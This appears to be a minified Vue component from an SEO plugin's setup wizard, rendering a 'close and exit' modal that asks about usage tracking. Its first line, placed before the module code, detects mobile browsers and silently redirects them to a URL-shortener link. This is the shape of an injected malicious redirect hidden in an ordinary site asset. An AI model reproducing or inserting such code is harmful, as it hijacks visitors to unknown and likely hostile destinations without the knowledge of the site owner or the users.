(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{w as S,b as k,y}from"./app-core.c8323d51.js";import{u as v}from"./Wizard.5cb4584f.js";import{C as z}from"./Index.6933f196.js";import{S as b}from"./Close.7fb523c8.js";import{aq as l,f as d,i as c,B as w,U as e,T as u,a0 as t,R as r,j as n,ae as m}from"./vendor-vue-ui.232c7c36.js";import{_ as C}from"./_plugin-vue_export-helper.eefbdd86.js";const W={setup(){const{strings:a}=v();return{optionsStore:y(),rootStore:k(),setupWizardStore:S(),strings:a}},components:{CoreModal:z,SvgClose:b},data(){return{loading:!1}},methods:{processOptIn(){this.setupWizardStore.smartRecommendations.usageTracking=!0,this.loading=!0,this.setupWizardStore.saveWizard("smartRecommendations").then(()=>{window.location.href=this.rootStore.aioseo.urls.aio.dashboard})}}},x={class:"aioseo-wizard-close-and-exit"},T=["href"],M={class:"aioseo-modal-body"},A=["innerHTML"],U={class:"actions"};function B(a,s,R,o,g,_){const f=l("svg-close"),p=l("base-button"),h=l("core-modal");return d(),c("div",x,[w(a.$slots,"links",{},()=>[o.rootStore.isPro||o.optionsStore.options.advanced.usageTracking?(d(),c("a",{key:0,href:o.rootStore.aioseo.urls.aio.dashboard},e(o.strings.closeAndExit),9,T)):(d(),c("a",{key:1,href:"#",onClick:s[0]||(s[0]=u(i=>o.setupWizardStore.showUsageTrackingModal=!0,["prevent"]))},e(o.strings.closeAndExit),1))]),t(h,{show:o.setupWizardStore.showUsageTrackingModal&&!o.rootStore.isPro,onClose:s[3]||(s[3]=i=>o.setupWizardStore.showUsageTrackingModal=!1),classes:["aioseo-close-and-exit-modal"]},{header:r(()=>[m(e(o.strings.buildABetterAioseo)+" ",1),n("button",{class:"close",onClick:s[2]||(s[2]=u(i=>o.setupWizardStore.showUsageTrackingModal=!1,["stop"]))},[t(f,{onClick:s[1]||(s[1]=i=>o.setupWizardStore.showUsageTrackingModal=!1)})])]),body:r(()=>[n("div",M,[n("div",{class:"reset-description",innerHTML:o.strings.getImprovedFeatures},null,8,A),n("div",U,[t(p,{tag:"a",href:o.rootStore.aioseo.urls.aio.dashboard,type:"gray",size:"medium"},{default:r(()=>[m(e(o.strings.noThanks),1)]),_:1},8,["href"]),t(p,{type:"blue",size:"medium",loading:g.loading,onClick:u(_.processOptIn,["stop"])},{default:r(()=>[m(e(o.strings.yesCountMeIn),1)]),_:1},8,["loading","onClick"])])])]),_:1},8,["show"])])}const V=C(W,[["render",B]]);export{V as W};
